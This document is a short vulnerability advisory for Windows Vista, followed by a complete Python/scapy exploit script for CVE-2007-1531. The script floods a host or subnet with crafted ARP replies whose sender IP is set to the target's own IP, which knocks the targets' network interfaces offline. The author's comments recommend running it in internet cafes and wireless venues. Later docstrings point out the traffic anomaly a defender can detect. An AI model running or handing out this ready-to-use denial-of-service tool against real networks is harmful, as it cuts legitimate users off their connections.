
source: https://www.securityfocus.com/bid/23266/info
Microsoft Windows Vista is prone to a denial-of-service vulnerability.
Remote attackers may exploit this issue by submitting malicious ARP requests to the vulnerable computer. To exploit this issue, attackers must have access to the local network segment of a target computer.
Remote attackers can exploit this issue to cause the network interface to stop responding, denying further service to legitimate users.
#!/usr/bin/env python
#
# :: Kristian Hermansen ::
# Date: 20070514
# Reference: CVE-2007-1531
# Description: Microsoft Windows Vista (SP0) dumps interfaces when
# it receives this ARP packet. This DoS is useful for an internet
# cafe, wireless venue, or legitimate local attack. The victim will
# need to manually refresh their network interface. OK, sure
# it's a dumb local attack, but why does Vista disable iface!?!??
# -> Thanks to Newsham / Hoagland
# Vulnerable: Microsoft Windows Vista (SP0) [All Versions]
# Tested:
# * victim == Windows Vista Enterprise (SP0) [English]
# * attacker == Ubuntu Feisty (7.04)
# Usage: python fISTArp.py <victim>
# Depends: scapy.py
# [?] If you don't have scapy
# [+] wget http://hg.secdev.org/scapy/raw-file/tip/scapy.py

from sys import argv
from os import geteuid
from scapy import Ether,ARP,send,srp,conf
from time import sleep
# Set scapy's verbosity to 0 so its own send/receive chatter is suppressed
# and only this script's prints reach stdout (scapy's `conf.verb` is its
# global verbosity knob).
conf.verb = 0

def head():
    """Print the tool's ASCII-art banner to stdout.

    The banner is a single triple-quoted literal; it has no inputs and no
    return value.  NOTE(review): the spacing of the art rows looks collapsed
    in this copy of the file, and rows that end in a bare backslash act as
    line continuations inside the literal as shown — compare with the
    upstream file before relying on the exact rendering.
    """
    print """
__ ___ ____ _____ _
/ _|_ _/ ___|_ _|/ \ _ __ _ __
| |_ | |\___ \ | | / _ \ | '__| '_ \
| _|| | ___) || |/ ___ \| | | |_) |
|_| |___|____/ |_/_/ \_\_| | .__/
|_|

"""
def isroot():
    """Return True when the effective UID is 0, otherwise print a hint and return False.

    The script needs root for what it does later (see the caller); this
    check is the only privilege gate, and it reports the problem on stdout
    rather than raising.
    """
    running_as_root = geteuid() == 0
    if not running_as_root:
        print("TRY AGAIN AS ROOT SILLY...")
    return running_as_root
def usage():
    """Print the command-line synopsis and two examples to stdout.

    Uses argv[0] as the program name.  The second example shows that the
    single argument may be a CIDR range rather than one host.  Returns None.
    """
    prog = argv[0]
    lines = [
        ["usage:", prog, "<victim(s)>"],
        ["examples:", prog, "192.168.1.100"],
        ["examples:", prog, "192.168.1.0/24\n"],
    ]
    for words in lines:
        # Space-joined, one line each — same output the print statement gave.
        print(" ".join(words))
def fisting():
    """Sweep argv[1] forever: ARP-probe each address and, when it answers,
    send it the crafted ARP reply associated with CVE-2007-1531.

    argv[1] is used unvalidated as the ARP target; per usage() it may be a
    single host or a CIDR range, and iterating the ARP packet presumably
    yields one packet per address (scapy expands ranged fields on
    iteration — confirm against the scapy version in use).

    The crafted packet is an ARP reply (op=2) whose sender IP is overwritten
    with the target's own IP (psrc = pdst).  From a defender's side that
    self-referential reply is the observable anomaly: a legitimate ARP reply
    never names the recipient's address as its sender, so ARP inspection on
    the segment can flag it.  The function never returns on its own; it is
    stopped with CTRL-C.  Indentation below was reconstructed from an
    unindented copy of the file.
    """
    # One template packet; op=2 is an ARP "is-at" reply.  pdst comes straight
    # from the command line.
    arp_fist = ARP(pdst=argv[1],op=2)
    print "We are going to loop forever, CTRL-C to stop...\n"
    while True:
        sleep(3)
        for a in arp_fist:
            # Liveness probe: a broadcast who-has for this one address.
            arping = Ether(dst="ff:ff:ff:ff:ff:ff")/ARP(pdst=a.pdst)
            # srp returns (answered, unanswered); 0.1 s is a short window and
            # will miss slow responders.
            ans,unans = srp(arping,timeout=0.1)
            if len(ans) == 1:
                # The trigger: sender IP set equal to the target IP.
                a.psrc=a.pdst
                print a.pdst, "is ALIVE!"
                print "* Time to shut it down!"
                send(a)
                # Re-probe once; a single missing reply is taken as success,
                # which also matches a host that simply answered too slowly.
                ans2,unans2 = srp(arping,timeout=0.1)
                if len(unans2) == 1:
                    print "@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@"
                    print "@@@", a.psrc, "was rubber fisted!"
                    print "@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@"
                    sleep(3)
                else:
                    print "FAILED:", a.pdst, "is still alive :-("
            else:
                print a.pdst, "is already DEAD!"
            # Blank separator line; assumed to sit inside the per-address loop.
            print
# Script entry: banner, privilege gate, argument check, then the main loop.
head()
# The script insists on running as root (see isroot()); exit non-zero otherwise.
if not isroot():
    exit(1)
# Exactly one positional argument — the victim host or CIDR range — is expected.
if len(argv) == 2:
    fisting()
else:
    usage()
    exit(1)
# u.b.u.n.t.u n.e.t.s.n.i.p.e.r t.h.c.t.e.st. |